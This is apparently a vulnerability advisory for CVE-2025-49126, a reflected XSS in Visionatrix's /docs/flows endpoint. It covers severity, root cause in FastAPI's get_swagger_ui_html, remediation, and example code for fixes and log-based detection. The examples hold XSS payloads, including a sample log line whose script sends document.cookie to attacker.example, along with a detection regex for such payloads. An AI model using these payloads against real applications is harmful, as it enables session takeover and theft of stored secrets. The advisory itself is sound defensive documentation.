EUVD-2025-18919 | CVE-2025-49126
Severity: HIGH (CVSS 3.1 base score 8.8)
Published: 2025-06-23

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Changed
Confidentiality: High
Integrity: Low
Availability: Low

Lifecycle Timeline

Analysis Generated: Mar 15, 2026 - 22:10 (vuln.today)
EUVD ID Assigned: Mar 15, 2026 - 22:10 (euvd), EUVD-2025-18919
CVE Published: Jun 23, 2025 - 18:15 (nvd), HIGH 8.8

Description

Visionatrix is an AI Media processing tool using ComfyUI. In versions 1.5.0 to before 2.5.1, the /docs/flows endpoint is vulnerable to a Reflected XSS (Cross-Site Scripting) attack allowing full takeover of the application and exfiltration of secrets stored in the application. The implementation uses the get_swagger_ui_html function from FastAPI. This function does not encode or sanitize its arguments before using them to generate the HTML for the swagger documentation page and is not intended to be used with user-controlled arguments. Any user of this application can be targeted with a one-click attack that can take over their session and all the secrets that may be contained within it. This issue has been patched in version 2.5.1.

Analysis

Visionatrix versions 1.5.0 through 2.5.0 contain a reflected XSS vulnerability in the /docs/flows endpoint. An unauthenticated attacker who gets a user to open a crafted link executes arbitrary JavaScript in that user's browser, in the application's origin. The flaw stems from passing unsanitized, request-controlled input to FastAPI's get_swagger_ui_html(), which interpolates its arguments into the page without encoding; the injected script can hijack the victim's session and exfiltrate secrets stored in the application. The CVSS 3.1 score of 8.8 (High) reflects network reachability, low attack complexity, no privileges required and a changed scope (the payload runs in a victim's browser rather than on the vulnerable server), tempered only by the required user interaction.

Technical Context

Visionatrix is an AI media processing application built on ComfyUI; its backend is a FastAPI service that serves Swagger UI for API documentation. The vulnerable /docs/flows handler passes request-derived values into FastAPI's get_swagger_ui_html() to build the documentation page. The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation): get_swagger_ui_html() interpolates its arguments (openapi_url, title and the asset URLs) straight into an HTML template without HTML encoding or validation, because FastAPI expects those values to come from application configuration, not from the request. When data an attacker can influence, such as a query parameter (the advisory does not say which argument Visionatrix fed from the request), reaches one of those arguments, it is rendered verbatim, so a value that closes the surrounding tag or attribute and opens a script element executes in the victim's browser in the application's origin. From there the script can read every cookie not marked HttpOnly and everything in localStorage, and, more importantly, call the Visionatrix API with the victim's session and forward the responses, including any stored secrets, to an attacker-controlled host.
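The pattern described above, as an added example that is not code from Visionatrix or FastAPI: a minimal stand-in for how a Swagger UI page is assembled by string interpolation (title in the title element, openapi_url inside the inline init script, the same shape as get_swagger_ui_html()), the pre-fix handler that renders a request value verbatim, and two fixes beside it. The render function, the query parameter name flow, the flow catalogue and the attack string are all assumptions made for this example; the advisory does not say which argument Visionatrix fed from the request.

```python
"""Added example, not code from Visionatrix or FastAPI.

render_swagger_page() is a stand-in that copies the shape of FastAPI's
get_swagger_ui_html() (f-string interpolation, no encoding); it is not that
function.  The query parameter 'flow', the KNOWN_FLOWS catalogue and
ATTACK_QUERY are constructed for this example.
"""
import re
from html import escape
from typing import Optional
from urllib.parse import parse_qs

OPENAPI_URL = "/openapi.json"   # fixed; never taken from the request

# Constructed catalogue of flow ids -> display titles (hypothetical).
KNOWN_FLOWS = {
    "sdxl-upscale": "SDXL upscale",
    "face-restore": "Face restore",
}
FLOW_ID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def render_swagger_page(openapi_url: str, title: str) -> str:
    """Stand-in for get_swagger_ui_html(): plain interpolation, no encoding."""
    return (
        "<!DOCTYPE html><html><head>"
        f"<title>{title}</title></head><body>"
        '<div id="swagger-ui"></div><script>'
        f"const ui = SwaggerUIBundle({{url: '{openapi_url}', dom_id: '#swagger-ui'}});"
        "</script></body></html>"
    )


def vulnerable_docs_flows(raw_query: str) -> str:
    """Pre-fix pattern: a request value reaches the helper untouched."""
    flow = parse_qs(raw_query).get("flow", [""])[0]
    return render_swagger_page(OPENAPI_URL, f"Visionatrix flow: {flow}")


def escape_only_docs_flows(raw_query: str) -> str:
    """Minimal fix: HTML-encode before interpolating into the <title> text node.
    Correct for this context only; a value landing inside the JS string
    (openapi_url) would need JS-string escaping or, better, an allowlist."""
    flow = parse_qs(raw_query).get("flow", [""])[0]
    return render_swagger_page(OPENAPI_URL, escape(f"Visionatrix flow: {flow}", quote=True))


def hardened_docs_flows(raw_query: str) -> Optional[str]:
    """Stronger fix: treat the request value as an opaque key, never as text.
    Malformed or unknown ids are refused (caller answers 404), not rendered."""
    flow = parse_qs(raw_query).get("flow", [""])[0]
    if not FLOW_ID_RE.fullmatch(flow):
        return None
    title = KNOWN_FLOWS.get(flow)
    if title is None:
        return None
    # Belt and braces: encode even an allowlisted, server-side title.
    return render_swagger_page(OPENAPI_URL, escape(title, quote=True))


def count_script_tags(html: str) -> int:
    """The page legitimately carries exactly one <script>; more means injection."""
    return html.lower().count("<script")


# Constructed attack query, URL-encoded as it would appear in a crafted link:
# flow=</title><script>alert(document.cookie)</script>
ATTACK_QUERY = "flow=%3C%2Ftitle%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E"

if __name__ == "__main__":
    print("vulnerable :", count_script_tags(vulnerable_docs_flows(ATTACK_QUERY)), "script tags")
    print("escape only:", count_script_tags(escape_only_docs_flows(ATTACK_QUERY)), "script tag")
    print("hardened   :", hardened_docs_flows(ATTACK_QUERY))
```

The escape-only variant is what a one-line patch looks like and is enough for the title context, but html.escape() is not a general fix for this helper: openapi_url is emitted inside a single-quoted JavaScript string, where the relevant terminators are a quote, a backslash and the sequence that closes the script element, none of which HTML encoding addresses. Refusing anything that is not a known key avoids having to reason about each output context.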

Affected Products

Visionatrix AI Media Processing Tool: every release from 1.5.0 up to and including 2.5.0 is vulnerable; 2.5.1 and later are fixed. The advisory states the range only and does not enumerate individual releases. An NVD CPE entry, if one is assigned, would take the form cpe:2.3:a:visionatrix:visionatrix:*:*:*:*:*:*:*:* with a version range of [1.5.0, 2.5.1). Deployment architecture (local, cloud, container) does not matter, because the flaw lives in the application's own FastAPI route. Note that a reflected XSS needs a victim, not an attacker, to reach the server: an instance bound to localhost is still exposed to a user on that host who opens a crafted link to it.

Remediation

Upgrade Visionatrix from any version in the range 1.5.0 through 2.5.0 to 2.5.1 or later; that is the only complete fix. The advisory does not describe the patch, but a fix for this bug class either stops feeding request-controlled values to get_swagger_ui_html() or validates and HTML-encodes them first. Until the upgrade can be applied:

(1) Block or restrict the /docs/flows path at the reverse proxy (an nginx or Apache location rule that returns 403 or 404 for it); the rest of the API is unaffected.
(2) Restrict who can reach the application at all (firewall or WAF rules). This limits who can be a victim, not who can craft the link, because the attacker never has to reach the server themselves.
(3) Set the HttpOnly and Secure flags on session cookies. This stops document.cookie reads but is only a partial mitigation: script running in the application's origin can still call the Visionatrix API with the victim's session and forward the responses, which is how stored secrets would be exfiltrated.
(4) If exploitation is suspected, or access logs show crafted /docs/flows requests, rotate any secrets stored in the application and invalidate active sessions.

Apply version 2.5.1 as the definitive fix. Check the vendor repository and release notes (likely the Visionatrix GitHub project) for patch details and upgrade procedures.
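For step (4), a retrospective check over reverse-proxy access logs, as an added example that is not part of the advisory or the Visionatrix project: it parses lines in the nginx combined format, decodes the query string once (as the application would) and flags requests to /docs/flows whose decoded query carries markup, a script URL or an event-handler attribute. The log lines, the flow parameter name and the marker list are constructed for this example; a hit proves the server answered a crafted request, not that a victim's browser executed the payload.

```python
"""Added example, not code from the advisory or the Visionatrix project.

Scans nginx 'combined' access-log lines (CONSTRUCTED_LOG below is made up)
for /docs/flows requests whose decoded query string contains characters or
tokens a reflected XSS payload needs.  The parameter name, marker list and
sample lines are this example's assumptions, not the vendor's.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# nginx default 'combined' log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Anything a reflected value must contain to break out of a text node or an
# attribute, plus the two tokens that turn an attribute into code.
XSS_MARKERS = re.compile(r'[<>"\']|javascript:|\bon[a-z]+\s*=', re.IGNORECASE)

VULNERABLE_PATH = "/docs/flows"

# Constructed sample: one benign request, two crafted ones, one unrelated path.
CONSTRUCTED_LOG = """\
203.0.113.7 - - [23/Jun/2025:18:20:01 +0000] "GET /docs/flows?flow=sdxl-upscale HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.9 - - [23/Jun/2025:18:21:44 +0000] "GET /docs/flows?flow=%3C%2Ftitle%3E%3Cscript%3Efetch(%22https%3A%2F%2Fattacker.example%2F%3Fc%3D%22%2Bdocument.cookie)%3C%2Fscript%3E HTTP/1.1" 200 5312 "https://mail.example/" "Mozilla/5.0"
203.0.113.7 - - [23/Jun/2025:18:22:10 +0000] "GET /api/flows HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.9 - - [23/Jun/2025:18:23:03 +0000] "GET /docs/flows?flow=test%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 5290 "-" "curl/8.5.0"
"""


def parse_combined_log(line: str):
    """Return the fields of one combined-format line plus decoded path/query,
    or None for a line that does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = unquote_plus(parts.query)   # decode once, as the app does
    return rec


def find_docs_flows_xss(lines):
    """Requests to the vulnerable path whose decoded query carries a marker."""
    hits = []
    for line in lines:
        rec = parse_combined_log(line)
        if rec is None or rec["path"] != VULNERABLE_PATH:
            continue
        m = XSS_MARKERS.search(rec["query"])
        if m:
            hits.append({
                "ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                "referer": rec["referer"], "query": rec["query"],
                "marker": m.group(0),
            })
    return hits


if __name__ == "__main__":
    for hit in find_docs_flows_xss(CONSTRUCTED_LOG.splitlines()):
        print(hit["ts"], hit["ip"], hit["status"], repr(hit["query"]))
```

A 200 status on a vulnerable version means the payload was reflected into the page. An external Referer on such a request is worth noting separately: it suggests the link was delivered to a real user rather than sent by a scanner, and that user's session and any secrets reachable through it should be treated as exposed.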

Priority Score

44 (scale: Low / Medium / High / Critical)
Contributing factors: KEV 0, EPSS +0.1, CVSS +44, POC 0


EUVD-2025-18919 vulnerability details – vuln.today